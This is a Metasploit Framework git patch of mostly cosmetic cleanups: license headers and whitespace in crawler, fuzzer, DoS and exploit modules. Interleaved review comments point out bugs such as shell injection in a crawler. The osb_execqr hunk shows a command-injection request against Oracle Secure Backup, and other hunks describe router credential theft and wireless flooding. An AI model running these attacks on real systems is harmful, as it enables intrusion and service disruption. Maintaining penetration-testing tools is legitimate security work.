From 0e72894e583d3a64c993cda90ffb25c2efb77686 Mon Sep 17 00:00:00 2001 
From: Joshua Drake Date: Mon, 3 May 2010 17:13:09 +0000 Subject: [PATCH] more cleanups git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da --- data/msfcrawler/basic.rb | 31 +- data/msfcrawler/flash.rb | 54 ++-- data/msfcrawler/forms.rb | 53 ++-- data/msfcrawler/objects.rb | 27 +- data/msfcrawler/scripts.rb | 29 +- .../samples/framework/dump_module_info.rb | 4 + .../samples/framework/encode_file.rb | 4 + .../samples/framework/enumerate_modules.rb | 4 + .../framework/run_exploit_using_base.rb | 4 + .../framework/run_exploit_using_core.rb | 4 + .../samples/modules/auxiliary/sample.rb | 7 +- .../samples/modules/encoders/sample.rb | 17 +- .../samples/modules/exploits/sample.rb | 20 +- documentation/samples/modules/nops/sample.rb | 11 + .../modules/payloads/singles/sample.rb | 15 +- .../admin/http/tomcat_administration.rb | 5 +- .../auxiliary/admin/motorola/wr850g_cred.rb | 13 +- modules/auxiliary/admin/oracle/oracle_sql.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr.rb | 12 +- modules/auxiliary/dos/wifi/cts_rts_flood.rb | 10 +- modules/auxiliary/dos/wifi/file2air.rb | 17 +- .../auxiliary/dos/wifi/netgear_ma521_rates.rb | 4 +- .../auxiliary/dos/wifi/netgear_wg311pci.rb | 9 +- .../dos/windows/http/pi3web_isapi.rb | 17 +- .../fuzzers/smb/smb2_negotiate_corrupt.rb | 24 +- .../auxiliary/fuzzers/smb/smb_create_pipe.rb | 18 +- .../fuzzers/smb/smb_create_pipe_corrupt.rb | 38 +-- .../fuzzers/smb/smb_negotiate_corrupt.rb | 24 +- .../fuzzers/smb/smb_ntlm1_login_corrupt.rb | 36 +-- .../auxiliary/fuzzers/ssh/ssh_version_15.rb | 26 +- .../auxiliary/fuzzers/ssh/ssh_version_2.rb | 26 +- .../fuzzers/ssh/ssh_version_corrupt.rb | 26 +- .../fuzzers/tds/tds_login_corrupt.rb | 62 ++-- .../fuzzers/tds/tds_login_username.rb | 60 ++-- modules/auxiliary/gather/dns_enum.rb | 35 ++- .../gather/search_email_collector.rb | 28 +- .../scanner/backdoor/energizer_duo_detect.rb | 6 +- .../auxiliary/scanner/dect/call_scanner.rb | 26 +- 
.../auxiliary/scanner/dect/station_scanner.rb | 32 ++- .../auxiliary/scanner/finger/finger_users.rb | 6 +- modules/auxiliary/scanner/ftp/ftp_version.rb | 6 +- modules/auxiliary/scanner/http/cert.rb | 5 +- .../auxiliary/scanner/http/enum_delicious.rb | 10 +- .../auxiliary/scanner/http/enum_wayback.rb | 2 +- .../http/ms09_020_webdav_unicode_bypass.rb | 11 +- modules/auxiliary/scanner/http/options.rb | 7 +- modules/auxiliary/scanner/http/sqlmap.rb | 15 +- modules/auxiliary/scanner/http/ssl.rb | 4 +- modules/auxiliary/scanner/http/svn_scanner.rb | 8 +- modules/auxiliary/scanner/http/trace_axd.rb | 4 +- modules/auxiliary/scanner/http/web_vulndb.rb | 7 +- .../auxiliary/scanner/imap/imap_version.rb | 4 + .../scanner/misc/sunrpc_portmapper.rb | 9 +- modules/auxiliary/scanner/nfs/nfsmount.rb | 6 +- .../auxiliary/scanner/oracle/xdb_sid_brute.rb | 2 +- .../auxiliary/scanner/pop3/pop3_version.rb | 4 + .../auxiliary/scanner/smtp/smtp_version.rb | 4 + .../scanner/telnet/telnet_version.rb | 6 +- modules/auxiliary/scanner/x11/open_x11.rb | 6 +- modules/auxiliary/server/capture/ftp.rb | 7 +- modules/auxiliary/server/capture/http_ntlm.rb | 2 + modules/auxiliary/server/capture/telnet.rb | 11 + modules/auxiliary/server/file_autopwn.rb | 4 +- .../auxiliary/spoof/dns/bailiwicked_domain.rb | 1 - .../auxiliary/spoof/dns/compare_results.rb | 70 +++-- .../sqli/oracle/dbms_cdc_publish2.rb | 2 +- .../sqli/oracle/dbms_export_extension.rb | 2 +- .../auxiliary/sqli/oracle/jvm_os_code_10g.rb | 15 +- .../auxiliary/sqli/oracle/jvm_os_code_11g.rb | 15 +- modules/encoders/x86/alpha_mixed.rb | 8 +- .../exploits/multi/fileformat/maple_maplet.rb | 6 +- .../multi/ftp/wuftpd_site_exec_format.rb | 1 + .../wireshark_lwres_getaddrbyname_loop.rb | 5 +- .../osx/rtsp/quicktime_rtsp_content_type.rb | 3 + .../exploits/solaris/sunrpc/ypupdated_exec.rb | 11 +- .../unix/webapp/guestbook_ssi_exec.rb | 4 +- .../windows/backdoor/energizer_duo_payload.rb | 14 +- .../windows/browser/adobe_jbig2decode.rb | 31 +- 
.../windows/browser/adobe_utilprintf.rb | 20 +- .../windows/browser/ms09_043_owc_msdso.rb | 42 +-- .../browser/zenturiprogramchecker_unsafe.rb | 2 +- .../windows/fileformat/adobe_jbig2decode.rb | 16 +- .../windows/fileformat/mediajukebox.rb | 11 +- .../windows/fileformat/mymp3player_m3u.rb | 4 +- .../windows/ftp/vermillion_ftpd_port.rb | 1 + .../windows/http/bea_weblogic_jsessionid.rb | 1 + .../http/bea_weblogic_transfer_encoding.rb | 1 + .../exploits/windows/http/hp_nnm_ovwebhelp.rb | 2 +- .../windows/http/httpdx_handlepeer.rb | 1 + .../windows/http/httpdx_tolog_format.rb | 1 + modules/payloads/singles/linux/x86/chmod.rb | 12 +- modules/payloads/singles/linux/x86/exec.rb | 2 - modules/payloads/singles/windows/exec.rb | 2 - modules/payloads/stagers/osx/x86/bind_tcp.rb | 11 + modules/payloads/stages/netware/shell.rb | 4 + .../payloads/stages/osx/x86/bundleinject.rb | 2 - modules/payloads/stages/windows/dllinject.rb | 13 +- .../stages/windows/patchupdllinject.rb | 4 +- modules/payloads/stages/windows/vncinject.rb | 11 + .../payloads/stages/windows/x64/vncinject.rb | 10 +- msfcli | 38 +-- msfconsole | 8 +- msfd | 4 + msfelfscan | 4 +- msfencode | 4 + msfgui | 4 + msfmachscan | 4 + msfopcode | 4 + msfpayload | 4 + msfpescan | 4 + msfrpc | 8 +- msfrpcd | 10 +- msfweb | 4 + plugins/auto_add_route.rb | 5 + plugins/db_credcollect.rb | 7 + plugins/db_mysql.rb | 4 + plugins/db_postgres.rb | 4 + plugins/db_sqlite2.rb | 4 + plugins/db_sqlite3.rb | 4 + plugins/db_tracker.rb | 19 +- plugins/db_wmap.rb | 33 ++- plugins/event_tester.rb | 4 + plugins/ips_filter.rb | 25 +- plugins/msfd.rb | 4 + plugins/nexpose.rb | 4 + plugins/pcap_log.rb | 16 +- plugins/sample.rb | 11 +- plugins/session_tagger.rb | 5 + plugins/socket_logger.rb | 25 +- plugins/sounds.rb | 5 + plugins/thread.rb | 19 +- plugins/token_hunter.rb | 5 + plugins/xmlrpc.rb | 38 +-- scripts/meterpreter/checkvm.rb | 6 +- scripts/meterpreter/getcountermeasure.rb | 26 +- scripts/meterpreter/getgui.rb | 4 +- 
scripts/meterpreter/gettelnet.rb | 4 +- scripts/meterpreter/hostsedit.rb | 4 +- scripts/meterpreter/killav.rb | 4 +- scripts/meterpreter/migrate.rb | 4 +- scripts/meterpreter/multi_console_command.rb | 13 +- scripts/meterpreter/multicommand.rb | 2 +- scripts/meterpreter/multiscript.rb | 4 +- scripts/meterpreter/netenum.rb | 4 +- scripts/meterpreter/prefetchtool.rb | 24 +- scripts/meterpreter/remotewinenum.rb | 10 +- scripts/meterpreter/search_dwld.rb | 6 +- scripts/meterpreter/winbf.rb | 22 +- scripts/meterpreter/winenum.rb | 6 +- test/tests/03_range_walker_test.rb | 12 +- tools/convert_31.rb | 10 +- tools/exe2vba.rb | 4 + tools/exe2vbs.rb | 4 + tools/find_badchars.rb | 4 + tools/halflm_second.rb | 4 + tools/import_webscarab.rb | 68 ++--- tools/lm2ntcrack.rb | 4 + tools/metasm_shell.rb | 5 + tools/module_author.rb | 11 +- tools/module_license.rb | 10 +- tools/module_ports.rb | 4 + tools/module_reference.rb | 4 + tools/module_targets.rb | 2 + tools/msf_irb_shell.rb | 4 + tools/msfcrawler.rb | 265 +++++++++--------- tools/msfproxy.rb | 171 +++++------ tools/nasm_shell.rb | 4 + tools/pattern_create.rb | 6 +- tools/pattern_offset.rb | 2 + 169 files changed, 1487 insertions(+), 946 deletions(-) diff --git a/data/msfcrawler/basic.rb b/data/msfcrawler/basic.rb index 9bc3ee0f26..cf32fdf09f 100644 --- a/data/msfcrawler/basic.rb +++ b/data/msfcrawler/basic.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' 
@@ -6,28 +19,28 @@ require 'uri' class CrawlerSimple < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + doc = Hpricot(result.body.to_s) doc.search('a').each do |link| - + hr = link.attributes['href'] - - if hr and !hr.match(/^(\#|javascript\:)/) + + if hr and !hr.match(/^(\#|javascript\:)/) begin - hreq = urltohash('GET',hr,request['uri'],nil) - + hreq = urltohash('GET',hr,request['uri'],nil) + insertnewpath(hreq) - + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end end end - end + end end diff --git a/data/msfcrawler/flash.rb b/data/msfcrawler/flash.rb index 52d3a83b7d..334316f0b5 100644 --- a/data/msfcrawler/flash.rb +++ b/data/msfcrawler/flash.rb @@ -1,8 +1,20 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'uri' - $flarebinary = "/home/et/Downloads/flare" $flareoutdir = "/home/et/Downloads/" 
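Review bot: `if !result['Content-Type'].include? "text/html"` at the top of `parse` will raise NoMethodError on a response that carries no Content-Type header, if `result['Content-Type']` is nil in that case as it appears to be for a missing header; a crawled site can trigger this, and the `rescue URI::InvalidURIError` below does not cover it. Coercing first, `if !result['Content-Type'].to_s.include? "text/html"`, makes the guard return quietly instead. The same check, unchanged by this commit, appears in the flash.rb, forms.rb, objects.rb and scripts.rb hunks of this patch. Separately, `hr.match(/^(\#|javascript\:)/)` anchors at any line start rather than the start of the string, so `\A` is the intended anchor for an href value.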
@@ -13,52 +25,52 @@ class CrawlerFlash < BaseParser rexp = ['loadMovieNum\(\'(.*?)\'', 'loadMovie\(\'(.*?)\'', 'getURL\(\'(.*?)\'' - ] + ] + - if !result['Content-Type'].include? "application/x-shockwave-flash" return end - + outswf = File.join($flareoutdir,request['uri'].gsub(/\//,'_')) - - puts "Downloading SWF file to: #{outswf}" - - ffile = File.new(outswf, "wb") + + puts "Downloading SWF file to: #{outswf}" + + ffile = File.new(outswf, "wb") ffile.puts(result.body) - ffile.close + ffile.close system("#{$flarebinary} #{outswf}") - + outflr = outswf.gsub('.swf','.flr') - + if File.exists?(outflr) - puts "Decompiled SWF file to: #{outflr}" + puts "Decompiled SWF file to: #{outflr}" else puts "Error: Decompilation failed." return end - + File.open(outflr, "r") do |infile| while (line = infile.gets) - rexp.each do |r| - links = line.to_s.scan(Regexp.new(r,true)) #" - links.each do |link| - + rexp.each do |r| + links = line.to_s.scan(Regexp.new(r,true)) #" + links.each do |link| + begin hreq = urltohash('GET',link[0],request['uri'],nil) insertnewpath(hreq) - + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end + end end end - end - end + end + end end diff --git a/data/msfcrawler/forms.rb b/data/msfcrawler/forms.rb index 7590b38f77..9be3852daf 100644 --- a/data/msfcrawler/forms.rb +++ b/data/msfcrawler/forms.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,11 +19,11 @@ require 'uri' class CrawlerForms < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + hr = '' m = '' 
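Review bot: `system("#{$flarebinary} #{outswf}")` hands a string to the shell whose `outswf` component is derived from `request['uri']` with only `/` replaced, so any shell metacharacter in a crawled URL is interpreted by the shell on the crawler operator's host; the argument-list form `system($flarebinary, outswf)` runs the binary without a shell and removes that exposure. The `File.new(outswf, "wb")` / `ffile.close` pair is also not exception-safe; `File.open(outswf, "wb") { |f| f.puts(result.body) }` closes the handle on every path. The enclosing `parse` starts above this hunk.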
@@ -21,44 +34,44 @@ class CrawlerForms < BaseParser fname = f.attributes['name'] if fname.empty? fname = "NONE" - end + end m = "GET" if !f.attributes['method'].empty? m = f.attributes['method'].upcase end - - #puts "Parsing form name: #{fname} (#{m})" - + + #puts "Parsing form name: #{fname} (#{m})" + htmlform = Hpricot(f.inner_html) - + arrdata = [] - + htmlform.search('input').each do |p| #puts p.attributes['name'] #puts p.attributes['type'] #puts p.attributes['value'] - - #raw_request has uri_encoding disabled as it encodes '='. - arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value'])) + + #raw_request has uri_encoding disabled as it encodes '='. + arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value'])) end - + data = arrdata.join("&").to_s - - + + begin hreq = urltohash(m,hr,request['uri'],data) - + hreq['ctype'] = 'application/x-www-form-urlencoded' - + insertnewpath(hreq) - - + + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end - end + end + end end diff --git a/data/msfcrawler/objects.rb b/data/msfcrawler/objects.rb index 4a9e0011e6..86b66d05be 100644 --- a/data/msfcrawler/objects.rb +++ b/data/msfcrawler/objects.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,11 +19,11 @@ require 'uri' class CrawlerObjects < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + hr = '' m = '' 
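Review bot: `arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))` encodes the value but not the name, and, if `attributes['name']` yields an empty string for an input without a name attribute as the `fname.empty?` check above suggests, it emits a bogus `=value` pair for every such input (submit buttons, for example). Skipping nameless inputs and encoding both halves, `next if p.attributes['name'].empty?` before the append and `Rex::Text.uri_encode(p.attributes['name']) + "=" + ...` in it, produces a body the server will parse as intended. The `#puts "Error: #{link[0]}"` comment in the rescue refers to a `link` that does not exist in this file, which suggests it was copied from basic.rb. The enclosing `parse` starts above this hunk.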
@@ -21,15 +34,15 @@ class CrawlerObjects < BaseParser begin hreq = urltohash('GET',s,request['uri'],nil) - + insertnewpath(hreq) - - + + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end - end + end + end end diff --git a/data/msfcrawler/scripts.rb b/data/msfcrawler/scripts.rb index 78c81fb1b2..e5a043f400 100644 --- a/data/msfcrawler/scripts.rb +++ b/data/msfcrawler/scripts.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,11 +19,11 @@ require 'uri' class CrawlerScripts < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + hr = '' m = '' @@ -20,16 +33,16 @@ class CrawlerScripts < BaseParser s = obj['src'] begin - hreq = urltohash('GET',s,request['uri'],nil) - + hreq = urltohash('GET',s,request['uri'],nil) + insertnewpath(hreq) - - + + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end - end + end + end end diff --git a/documentation/samples/framework/dump_module_info.rb b/documentation/samples/framework/dump_module_info.rb index cd7153cb6c..432baa4b51 100755 --- a/documentation/samples/framework/dump_module_info.rb +++ b/documentation/samples/framework/dump_module_info.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates how a module's information can be easily serialized # to a readable format. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/encode_file.rb b/documentation/samples/framework/encode_file.rb index b6a492b90c..70bf79e7d8 100755 --- a/documentation/samples/framework/encode_file.rb 
+++ b/documentation/samples/framework/encode_file.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates how a file can be encoded using a framework # encoder. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/enumerate_modules.rb b/documentation/samples/framework/enumerate_modules.rb index 3f07ae0a39..903a918040 100755 --- a/documentation/samples/framework/enumerate_modules.rb +++ b/documentation/samples/framework/enumerate_modules.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates enumerating all of the modules in the framework and # displays their module type and reference name. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/run_exploit_using_base.rb b/documentation/samples/framework/run_exploit_using_base.rb index 2608b3e00c..0a6f2a6b8b 100755 --- a/documentation/samples/framework/run_exploit_using_base.rb +++ b/documentation/samples/framework/run_exploit_using_base.rb @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates using the framework core directly to launch an # exploit. It makes use of the simplified exploit wrapper method provided by # the Msf::Simple::Exploit mixin. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/run_exploit_using_core.rb b/documentation/samples/framework/run_exploit_using_core.rb index cfc0284894..731aaac3c9 100755 --- a/documentation/samples/framework/run_exploit_using_core.rb +++ b/documentation/samples/framework/run_exploit_using_core.rb 
@@ -1,10 +1,14 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates using the framework core directly to launch an # exploit. It uses the framework base Framework class so that the # distribution module path is automatically set, but relies strictly on # framework core classes for everything else. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/modules/auxiliary/sample.rb b/documentation/samples/modules/auxiliary/sample.rb index b81d1fbcbe..c652322e97 100644 --- a/documentation/samples/modules/auxiliary/sample.rb +++ b/documentation/samples/modules/auxiliary/sample.rb @@ -1,15 +1,14 @@ ## -# $Id: test.rb 4419 2007-02-18 00:10:39Z hdm $ +# $Id$ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## - require 'msf/core' module Msf @@ -49,7 +48,7 @@ class Auxiliary::Sample < Msf::Auxiliary def cmd_aux_extra_command(*args) print_status("Running inside aux_extra_command()") end - + end end diff --git a/documentation/samples/modules/encoders/sample.rb b/documentation/samples/modules/encoders/sample.rb index d8789b2f68..b6db400593 100644 --- a/documentation/samples/modules/encoders/sample.rb +++ b/documentation/samples/modules/encoders/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + module Msf module Encoders @@ -28,7 +39,7 @@ class Sample < Msf::Encoder buf end -end - -end +end + +end end 
diff --git a/documentation/samples/modules/exploits/sample.rb b/documentation/samples/modules/exploits/sample.rb index 45ed39c04b..11be9e5a73 100644 --- a/documentation/samples/modules/exploits/sample.rb +++ b/documentation/samples/modules/exploits/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' module Msf @@ -19,20 +30,23 @@ class Exploits::Sample < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Sample exploit', 'Description' => %q{ - This exploit module illustrates how a vulnerability could be exploited + This exploit module illustrates how a vulnerability could be exploited in an TCP server that has a parsing bug. }, 'Author' => 'skape', 'Version' => '$Revision$', + 'References' => + [ + ], 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", }, - 'Targets' => + 'Targets' => [ # Target 0: Windows All - [ + [ 'Windows Universal', { 'Platform' => 'win', diff --git a/documentation/samples/modules/nops/sample.rb b/documentation/samples/modules/nops/sample.rb index 944f04588a..f9aadf17da 100644 --- a/documentation/samples/modules/nops/sample.rb +++ b/documentation/samples/modules/nops/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' module Msf diff --git a/documentation/samples/modules/payloads/singles/sample.rb b/documentation/samples/modules/payloads/singles/sample.rb index 5af0f5e5ae..bb7686175b 100644 --- a/documentation/samples/modules/payloads/singles/sample.rb 
+++ b/documentation/samples/modules/payloads/singles/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' module Msf @@ -30,6 +41,6 @@ module Sample end -end -end +end +end end diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index 5932dc4614..87de9cd3f9 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,7 +9,6 @@ # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index e17a4fdcd7..28e721185a 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary 
@@ -8,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Motorola WR850G v4.03 Credentials', 'Description' => %q{ - Login credentials to the Motorola WR850G router with + Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 9a4f328df5..ea710f3236 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 7688 $', + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 4b32b266cd..6673e97254 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary cmd = datastore['CMD'] uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool=" - + req = uri + Rex::Text.uri_encode(cmd) - + print_status("Sending command: #{datastore['CMD']}...") res = send_request_raw({'uri' => req,},5) - + print_status("Done.") - + end end diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 19ebd19de3..55e7aab0c2 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb 
@@ -20,14 +20,14 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Wireless CTS/RTS Flooder', 'Description' => %q{ - This module sends 802.11 CTS/RTS requests to a specific wireless peer, - using the specified source address, - }, - + This module sends 802.11 CTS/RTS requests to a specific wireless peer, + using the specified source address, + }, 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) + register_options( [ OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb index 5061dba47b..2fcd2ec19f 100644 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ b/modules/auxiliary/dos/wifi/file2air.rb @@ -1,15 +1,26 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info = {}) super(update_info(info, 'Name' => 'Wireless Frame (File) Injector', 'Description' => %q{ - Inspired by Josh Wright's file2air, this module writes + Inspired by Josh Wright's file2air, this module writes wireless frames from a binary file to the air, allowing you to substitute some addresses before it gets sent. Unlike the original file2air (currently v1.1), this module @@ -62,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary end close_wifi - end + end def substaddrs(frame) tods = (frame[1] & 1) == 1 diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index 6fe2377082..278c3c9b4e 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb 
@@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 @@ -35,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. }, - 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module + 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index 6384db1961..a8c2ac4f6d 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 @@ -32,18 +30,17 @@ class Metasploit3 < Msf::Auxiliary This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. - }, - 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module + 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => - [ + [ ['CVE', '2006-6125'], ['OSVDB', '30511'], ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'], - ] + ] )) register_options( [ diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index 05f600f16a..ac43bb5fb8 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb 
@@ -1,12 +1,23 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Pi3Web <=2.0.13 ISAPI DoS', 'Description' => %q{ The Pi3Web HTTP server crashes when a request is made @@ -39,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Request sent to #{rhost}:#{rport}") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport}") - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end end diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index eea2da254f..7f031cf29d 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ 